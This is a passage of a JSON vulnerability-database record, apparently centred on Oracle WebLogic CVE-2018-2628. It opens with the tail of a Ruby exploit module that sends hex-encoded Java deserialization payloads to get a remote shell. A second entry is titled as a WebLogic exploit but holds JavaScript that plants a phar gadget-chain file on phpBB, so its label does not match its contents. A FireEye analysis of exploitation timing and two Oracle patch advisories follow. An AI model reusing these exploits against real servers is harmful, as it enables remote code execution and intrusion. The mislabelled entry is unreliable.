<< '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078' \ndata << '707750210000000000000000000d3139322e3136382e312e323237001257494e' \ndata << '2d4147444d565155423154362e656883348cd6000000070000' \n \ndata << rport.to_s(16).rjust(4, '0') \n \ndata << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00' \ndata << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a' \ndata << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461' \ndata << '863d1d0000000078' \n \nsock.put([data].pack('H*')) \nsleep(2) \nsock.get_once \nend \n \ndef send_payload_objdata \n# JRMPClient2 payload generated from EDB PoC: \n# python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2 \n# Patch in srvhost and srvport \npayload = '056508000000010000001b0000005d0101007372017870737202787000000000' \npayload << '00000000757203787000000000787400087765626c6f67696375720478700000' \npayload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced' \npayload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e' \npayload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000' \npayload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d' \npayload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013' \npayload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870' \npayload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43' \npayload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61' \npayload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061' \npayload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65' \npayload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b' \npayload << '78707702000078fe010000' \n \n# Data \npayload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e' \npayload << 
'416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50' \npayload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67' \npayload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200' \npayload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76' \npayload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176' \npayload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133' \npayload << '1e030000787077' \n \nunicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join \nunicast_dat = '000a556e696361737452656600' \nunicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0') \nunicast_dat << unicast_srvhost \nunicast_dat << '0000' \nunicast_dat << srvport.to_s(16).rjust(4,'0') \nunicast_dat << '000000004e18654b000000000000000000000000000000' \nunicast_dat << '78' \n \npayload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0') \npayload << unicast_dat \n \npayload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461' \npayload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029' \npayload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669' \npayload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765' \npayload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269' \npayload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174' \npayload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66' \npayload << '6f3b290000001b7878fe00ff' \n \ndata = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0') \ndata << payload \n \nsock.put([data].pack('H*')) \nsleep(1) \nsock.put([data].pack('H*')) \nsleep(1) \nsock.get_once \nend \n \ndef exploit \n@met_sent = [] \ngen_resp \n \nconnect \nvprint_status('Sending handshake...') \nt3_handshake \n \nbuild_t3_request_object \n \nstart_service \n \nvprint_status('Sending payload...') \nsend_payload_objdata \n \n# Need to 
wait this long to make sure we get a shell back \nsleep(10) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148878/weblogic_deserialize.rb.txt"}, {"lastseen": "2019-03-08T19:21:29", "description": "", "published": "2019-03-07T00:00:00", "type": "packetstorm", "title": "Oracle Weblogic Server Deserialization Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-3245", "CVE-2018-2628"], "modified": "2019-03-07T00:00:00", "id": "PACKETSTORM:152014", "href": "https://packetstormsecurity.com/files/152014/Oracle-Weblogic-Server-Deserialization-Remote-Command-Execution.html", "sourceData": "`// All greets goes to RIPS Tech \n// Run this JS on Attachment Settings ACP page \nvar plupload_salt = ''; \nvar form_token = ''; \nvar creation_time = ''; \nvar filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip \n// your payload here \nvar payload = '<?php __HALT_COMPILER(); ?>\\x0d\\x0a\\xfe\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x01'+'\\x00'.repeat(5)+'\\xc8\\x01\\x00\\x00O:31:\"GuzzleHttp\\x5cCookie\\x5cFileCookieJar\":4:{s:41:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00filename\";s:30:\"/var/www/html/phpBB3/pinfo.php\";s:52:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00storeSessionCookies\";b:1;s:36:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00cookies\";a:1:{i:0;O:27:\"GuzzleHttp\\x5cCookie\\x5cSetCookie\":1:{s:33:\"\\x00GuzzleHttp\\x5cCookie\\x5cSetCookie\\x00data\";a:3:{s:7:\"Expires\";i:1;s:7:\"Discard\";b:0;s:5:\"Value\";s:17:\"<?php phpinfo();#\";}}}s:39:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00strictMode\";N;}\\x08\\x00\\x00\\x00test.txt\\x04\\x00\\x00\\x00K>\\x10\\x5c\\x04\\x00\\x00\\x00\\x0c~\\x7f\\xd8\\xb6\\x01'+'\\x00'.repeat(6)+'test\\xa0\\x17\\xd2\\xe0R\\xcf 
\\xf6T\\x1d\\x01X\\x91(\\x9dD]X\\x0b>\\x02\\x00\\x00\\x00GBMB'; \nvar byteArray = Uint8Array.from(payload, function(c){return c.codePointAt(0);}); \nvar sid = (new URL(document.location.href)).searchParams.get('sid'); \nvar url = '/adm/index.php'; \nvar getparams = { \n'i': 'acp_database', \n'sid': sid, \n'mode': 'backup' \n}; \n$.get(url, getparams, function(data) { \nform_token = $(data).find('[name=\"form_token\"]').val(); \ncreation_time = $(data).find('[name=\"creation_time\"]').val(); \nif(form_token && creation_time) { \nvar posturl = '/adm/index.php?i=acp_database&sid=|&mode=backup&action=download'; \nvar postdata = { \n'type': 'data', \n'method': 'text', \n'where': 'download', \n'table[]': 'phpbb_config', \n'submit': 'Submit', \n'creation_time': creation_time, \n'form_token': form_token \n} \n$.post(posturl.replace(\"|\", sid), postdata, function (data) { \nplupload_salt = data.match(/plupload_salt',\\s*'(\\w{32})/)[1]; \nif (plupload_salt) { \nfilepath = filepath.replace(\"$salt\", plupload_salt); \nvar postdata = new FormData(); \npostdata.append('name', 'evil.zip'); \npostdata.append('chunk', 0); \npostdata.append('chunks', 2); \npostdata.append('add_file', 'Add the file'); \npostdata.append('real_filename', 'evil.zip'); \n// file \nvar pharfile = new File([byteArray], 'evil.zip'); \npostdata.append('fileupload', pharfile); \njQuery.ajax({ \nurl: '/posting.php?mode=reply&f=2&t=1', \ndata: postdata, \ncache: false, \ncontentType: false, \nprocessData: false, \nmethod: 'POST', \nsuccess: function(data){ \nif (\"id\" in data) { \n$('#img_imagick').val(filepath).focus(); \n$('html, body').animate({ \nscrollTop: ($('#submit').offset().top) \n}, 500); \n} \n} \n}); \n \n} \n}, 'text'); \n} \n}); \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152014/oraclewls-deserializeexec.txt"}], "fireeye": [{"lastseen": "2020-11-23T01:38:39", 
"bulletinFamily": "info", "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2018-0101", "CVE-2018-0296", "CVE-2018-11776", "CVE-2018-15982", "CVE-2018-20250", "CVE-2018-2628", "CVE-2018-2893", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-8440", "CVE-2019-0863", "CVE-2019-3396", "CVE-2019-6340"], "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. Check out our first post on zero-day vulnerabilities._\n\nAttackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.\n\n \nFigure 1: Percentage of vulnerabilities exploited at various times in relation to patch release\n\nFireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 to Q3 2019. The majority of vulnerabilities were exploited as zero-days \u2013 before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.\n\nWe believe these numbers to be conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. 
It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.\n\n \nFigure 2: Time between vulnerability exploitation and patch issuance\n\n_Time Between Disclosure and Patch Release_\n\nThe average time between disclosure and patch availability was approximately 9 days. This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.\n\n_Exploitation After Patch Release_\n\nWhile the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.\n\n**Time to Exploit for Vulnerabilities First Exploited after a Patch** \n \n--- \n \nHours\n\n| \n\nTwo vulnerabilities were successfully exploited within hours of a patch release, CVE-2018-2628 and CVE-2018-7602. \n \nDays\n\n| \n\n12 percent of vulnerabilities were exploited within the first week following the patch release. \n \nOne Month\n\n| \n\n15 percent of vulnerabilities were exploited after one week but within one month of patch release. 
\n \nYears\n\n| \n\nIn multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior. \n \nTable 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure\n\n#### Case Studies\n\nWe continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.\n\n \nFigure 3: Timeline of activity for CVE-2018-15982\n\nCVE-2018-15982: A use after free vulnerability in a file package in Adobe Flash Player 31.0.0.153 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups\u2014Russia's APT28 and North Korea's APT37\u2014as well as TEMP.MetaStrike and other financially motivated attackers.\n\n \nFigure 4: Timeline of activity for CVE-2018-20250\n\nCVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. 
This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean, and Russian groups, as well as Iranian groups APT33 and TEMP.Zagros.\n\n \nFigure 5: Timeline of Activity for CVE-2018-4878\n\nCVE-2018-4878: A use after free vulnerability exists within the DRMManager\u2019s \u201cinitialize\u201d call in Adobe Flash Player 28.0.0.137 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea\u2019s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. Within 8 days of disclosure, we observed Russia\u2019s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea\u2019s TEMP.Hermit also using it within approximately a month of disclosure.\n\n#### Availability of PoC or Exploit Code\n\nThe availability of PoC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that PoC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or PoC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. 
There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).\n\n**Time Between PoC or Exploit Code Publication and First Observed Potential Exploitation Events**\n\n| \n\n**Product**\n\n| \n\n**CVE**\n\n| \n\n**FireEye Risk Rating** \n \n---|---|---|--- \n \n1 day\n\n| \n\nWinRAR\n\n| \n\nCVE-2018-20250\n\n| \n\nMedium \n \n1 day\n\n| \n\nDrupal\n\n| \n\nCVE-2018-7600\n\n| \n\nHigh \n \n1 day\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0296\n\n| \n\nMedium \n \n2 days\n\n| \n\nApache Struts\n\n| \n\nCVE-2018-11776\n\n| \n\nHigh \n \n2 days\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0101\n\n| \n\nHigh \n \n2 days\n\n| \n\nOracle WebLogic Server\n\n| \n\nCVE-2018-2893\n\n| \n\nHigh \n \n2 days\n\n| \n\nMicrosoft Windows Server\n\n| \n\nCVE-2018-8440\n\n| \n\nMedium \n \n2 days\n\n| \n\nDrupal\n\n| \n\nCVE-2019-6340\n\n| \n\nMedium \n \n2 days\n\n| \n\nAtlassian Confluence\n\n| \n\nCVE-2019-3396\n\n| \n\nHigh \n \nTable 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018\u2013Q3 2019\n\n#### Trends by Targeted Products\n\nFireEye judges that malicious actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.\n\nThe majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. 
In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email-attached documents as initial infection vectors in phishing campaigns.\n\n \nFigure 6: Exploited vulnerabilities by vendor, Q1 2018\u2013Q3 2019\n\n#### Outlook and Implications\n\nThe speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.\n\nWe recommend using this exploitation trend information to better prioritize patching schedules. Combining it with other factors \u2014 such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely software is deployed in an organization's environment \u2014 may help to mitigate the risk of a large portion of malicious activity.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n", "modified": "2020-04-13T12:00:00", "published": "2020-04-13T12:00:00", "id": "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "href": "https://www.fireeye.com/blog/threat-research/2020/04/time-between-disclosure-patch-release-and-vulnerability-exploitation.html", "type": "fireeye", "title": "Think Fast: Time Between Disclosure, Patch Release and Vulnerability\nExploitation \u2014 Intelligence for Vulnerability Management, Part Two", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2020-10-04T21:15:53", "bulletinFamily": "software", "cvelist": ["CVE-2013-1768", "CVE-2014-0054", "CVE-2015-7501", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-3092", "CVE-2016-3506", "CVE-2016-5007", "CVE-2016-5019", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6305", "CVE-2016-6306", "CVE-2016-6307", "CVE-2016-6308", "CVE-2016-6309", "CVE-2016-6814", "CVE-2016-7052", "CVE-2016-8745", "CVE-2016-9878", "CVE-2017-10393", "CVE-2017-10400", "CVE-2017-12617", "CVE-2017-13077", "CVE-2017-13078", "CVE-2017-13080", "CVE-2017-13082", "CVE-2017-15095", "CVE-2017-15707", "CVE-2017-17562", "CVE-2017-3735", "CVE-2017-3736", "CVE-2017-3737", "CVE-2017-3738", "CVE-2017-5645", "CVE-2017-5662", "CVE-2017-5664", "CVE-2017-5715", "CVE-2017-5753", "CVE-2017-5754", "CVE-2017-7525", "CVE-2017-7674", "CVE-2017-7805", "CVE-2017-9798", "CVE-2018-0739", "CVE-2018-2563", "CVE-2018-2572", "CVE-2018-2587", "CVE-2018-2628", "CVE-2018-2718", "CVE-2018-2737", "CVE-2018-2738", "CVE-2018-2739", "CVE-2018-2742", "CVE-2018-2746", "CVE-2018-2747", "CVE-2018-2748", "CVE-2018-2749", "CVE-2018-2750", "CVE-2018-2752", "CVE-2018-2753", "CVE-2018-2754", "CVE-2018-2755", "CVE-2018-2756", "CVE-2018-2758", "CVE-2018-2759", "CVE-2018-2760", "CVE-2018-2761", "CVE-2018-2762", "CVE-2018-2763", "CVE-2018-2764", "CVE-2018-2765", "CVE-2018-2766", "CVE-2018-2768", "CVE-2018-2769", "CVE-2018-2770", "CVE-2018-2771", "CVE-2018-2772", "CVE-2018-2773", "CVE-2018-2774", "CVE-2018-2775", "CVE-2018-2776", "CVE-2018-2777", "CVE-2018-2778", "CVE-2018-2779", "CVE-2018-2780", "CVE-2018-2781", "CVE-2018-2782", "CVE-2018-2783", "CVE-2018-2784", "CVE-2018-2785", "CVE-2018-2786", "CVE-2018-2787", "CVE-2018-2788", "CVE-2018-2789", "CVE-2018-2790", "CVE-2018-2791", "CVE-2018-2792", "CVE-2018-2793", 
"CVE-2018-2794", "CVE-2018-2795", "CVE-2018-2796", "CVE-2018-2797", "CVE-2018-2798", "CVE-2018-2799", "CVE-2018-2800", "CVE-2018-2801", "CVE-2018-2802", "CVE-2018-2803", "CVE-2018-2804", "CVE-2018-2805", "CVE-2018-2806", "CVE-2018-2807", "CVE-2018-2808", "CVE-2018-2809", "CVE-2018-2810", "CVE-2018-2811", "CVE-2018-2812", "CVE-2018-2813", "CVE-2018-2814", "CVE-2018-2815", "CVE-2018-2816", "CVE-2018-2817", "CVE-2018-2818", "CVE-2018-2819", "CVE-2018-2820", "CVE-2018-2821", "CVE-2018-2822", "CVE-2018-2823", "CVE-2018-2824", "CVE-2018-2825", "CVE-2018-2826", "CVE-2018-2827", "CVE-2018-2828", "CVE-2018-2829", "CVE-2018-2830", "CVE-2018-2831", "CVE-2018-2832", "CVE-2018-2833", "CVE-2018-2834", "CVE-2018-2835", "CVE-2018-2836", "CVE-2018-2837", "CVE-2018-2838", "CVE-2018-2839", "CVE-2018-2840", "CVE-2018-2841", "CVE-2018-2842", "CVE-2018-2843", "CVE-2018-2844", "CVE-2018-2845", "CVE-2018-2846", "CVE-2018-2847", "CVE-2018-2848", "CVE-2018-2849", "CVE-2018-2850", "CVE-2018-2851", "CVE-2018-2852", "CVE-2018-2853", "CVE-2018-2854", "CVE-2018-2855", "CVE-2018-2856", "CVE-2018-2857", "CVE-2018-2858", "CVE-2018-2859", "CVE-2018-2860", "CVE-2018-2861", "CVE-2018-2862", "CVE-2018-2863", "CVE-2018-2864", "CVE-2018-2865", "CVE-2018-2866", "CVE-2018-2867", "CVE-2018-2868", "CVE-2018-2869", "CVE-2018-2870", "CVE-2018-2871", "CVE-2018-2872", "CVE-2018-2873", "CVE-2018-2874", "CVE-2018-2876", "CVE-2018-2877", "CVE-2018-2878", "CVE-2018-2879", "CVE-2018-7489"], "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. 
Please refer to:\n\n * Critical Patch Updates, Security Alerts and Bulletins for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 255 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2018 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/epmos/faces/DocumentDisplay?id=2383583.1>).\n\nThe January 2018 Critical Patch Update provided patches in response to the Spectre (CVE-2017-5753, CVE-2017-5715) and Meltdown (CVE-2017-5754) processor vulnerabilities. 
Please refer to this Advisory and the Addendum to the January 2018 Critical Patch Update Advisory for Spectre and Meltdown MOS note ([Doc ID 2347948.1](<https://support.oracle.com/epmos/faces/DocumentDisplay?id=2347948.1>)) for information on how to obtain these patches.\n", "modified": "2018-12-10T00:00:00", "published": "2018-04-17T00:00:00", "id": "ORACLE:CPUAPR2018", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - April 2018", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:20:57", "bulletinFamily": "software", "cvelist": ["CVE-2018-2768", "CVE-2018-2802", "CVE-2018-2775", "CVE-2018-2815", "CVE-2018-2748", "CVE-2018-2836", "CVE-2017-9798", "CVE-2018-2878", "CVE-2018-2826", "CVE-2018-2827", "CVE-2017-5753", "CVE-2017-5754", "CVE-2018-2817", "CVE-2018-2800", "CVE-2018-2868", "CVE-2018-2832", "CVE-2018-2789", "CVE-2018-2852", "CVE-2018-2808", "CVE-2018-2749", "CVE-2018-2747", "CVE-2018-2563", "CVE-2018-2860", "CVE-2018-2769", "CVE-2017-13080", "CVE-2016-5019", "CVE-2018-2776", "CVE-2018-7489", "CVE-2016-6306", "CVE-2018-2841", "CVE-2018-2759", "CVE-2016-2183", "CVE-2018-2870", "CVE-2018-2844", "CVE-2018-2822", "CVE-2018-2853", "CVE-2018-2746", "CVE-2016-2178", "CVE-2018-2755", "CVE-2018-2810", "CVE-2018-2812", "CVE-2018-2803", "CVE-2016-9878", "CVE-2017-10400", "CVE-2017-3735", "CVE-2018-2823", "CVE-2018-2842", "CVE-2018-2786", "CVE-2018-2778", "CVE-2018-2820", "CVE-2018-2765", "CVE-2018-2876", "CVE-2016-3092", "CVE-2018-2856", "CVE-2018-2872", "CVE-2018-2858", "CVE-2016-6302", "CVE-2017-13082", "CVE-2018-2819", "CVE-2018-2783", "CVE-2018-2774", "CVE-2016-8745", "CVE-2016-2177", "CVE-2018-2784", "CVE-2018-2771", "CVE-2018-2835", "CVE-2018-2848", "CVE-2018-2840", "CVE-2016-0635", "CVE-2018-2863", "CVE-2018-2867", "CVE-2018-2845", "CVE-2018-2824", "CVE-2018-2861", "CVE-2018-2777", "CVE-2018-2738", "CVE-2018-2838", "CVE-2018-2849", "CVE-2015-7501", "CVE-2018-2754", "CVE-2018-2795", "CVE-2016-6307", 
"CVE-2017-3737", "CVE-2013-1768", "CVE-2017-15707", "CVE-2018-2791", "CVE-2018-2807", "CVE-2018-2766", "CVE-2018-2763", "CVE-2018-2780", "CVE-2018-2879", "CVE-2018-2752", "CVE-2016-6308", "CVE-2017-13078", "CVE-2017-5662", "CVE-2018-2816", "CVE-2014-0054", "CVE-2018-2793", "CVE-2016-2180", "CVE-2018-2742", "CVE-2018-2739", "CVE-2017-7805", "CVE-2018-2798", "CVE-2018-2814", "CVE-2018-2855", "CVE-2018-2799", "CVE-2017-5715", "CVE-2018-2787", "CVE-2016-2181", "CVE-2018-2818", "CVE-2016-6304", "CVE-2018-2753", "CVE-2018-2756", "CVE-2018-2851", "CVE-2018-2796", "CVE-2018-2764", "CVE-2018-2837", "CVE-2018-2847", "CVE-2018-0739", "CVE-2017-17562", "CVE-2018-2805", "CVE-2018-2572", "CVE-2018-2801", "CVE-2018-2761", "CVE-2018-2821", "CVE-2018-2782", "CVE-2018-2831", "CVE-2018-2773", "CVE-2018-2797", "CVE-2018-2864", "CVE-2018-2828", "CVE-2018-2866", "CVE-2018-2587", "CVE-2018-2829", "CVE-2017-7525", "CVE-2018-2770", "CVE-2016-7052", "CVE-2018-2718", "CVE-2018-2781", "CVE-2018-2830", "CVE-2018-2806", "CVE-2017-5664", "CVE-2018-2779", "CVE-2018-2825", "CVE-2018-2813", "CVE-2016-5007", "CVE-2018-2854", "CVE-2018-2811", "CVE-2018-2762", "CVE-2018-2869", "CVE-2018-2790", "CVE-2017-3738", "CVE-2018-2877", "CVE-2018-2865", "CVE-2018-2760", "CVE-2018-2834", "CVE-2016-6305", "CVE-2016-6303", "CVE-2018-2772", "CVE-2018-2846", "CVE-2018-2792", "CVE-2017-5645", "CVE-2016-2182", "CVE-2018-2833", "CVE-2017-12617", "CVE-2018-2859", "CVE-2018-2843", "CVE-2018-2804", "CVE-2017-10393", "CVE-2018-2788", "CVE-2018-2628", "CVE-2018-2785", "CVE-2018-2750", "CVE-2018-2873", "CVE-2015-7940", "CVE-2017-3736", "CVE-2018-2758", "CVE-2017-13077", "CVE-2016-3506", "CVE-2018-2737", "CVE-2018-2809", "CVE-2018-2871", "CVE-2017-15095", "CVE-2016-2179", "CVE-2016-6814", "CVE-2017-7674", "CVE-2018-2857", "CVE-2018-2839", "CVE-2018-2850", "CVE-2018-2862", "CVE-2016-6309", "CVE-2018-2794", "CVE-2018-2874"], "description": "A Critical Patch Update is a collection of patches for multiple security 
vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n * [Critical Patch Updates, Security Alerts and Bulletins](<http://www.oracle.com/securityalerts>) for information about Oracle Security Advisories.\n\n \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 255 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2018 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2383583.1>).\n\nThe January 2018 Critical Patch Update provided patches in response to the Spectre (CVE-2017-5753, CVE-2017-5715) and Meltdown (CVE-2017-5754) processor vulnerabilities. Please refer to this Advisory and the Addendum to the January 2018 Critical Patch Update Advisory for Spectre and Meltdown MOS note ([Doc ID 2347948.1](<https://support.oracle.com/rs?type=doc&id=2347948.1>)) for information on how to obtain these patches.\n", "modified": "2018-12-10T00:00:00", "published": "2018-04-17T00:00:00", "id": "ORACLE:CPUAPR2018-3678067", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - April 2018", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}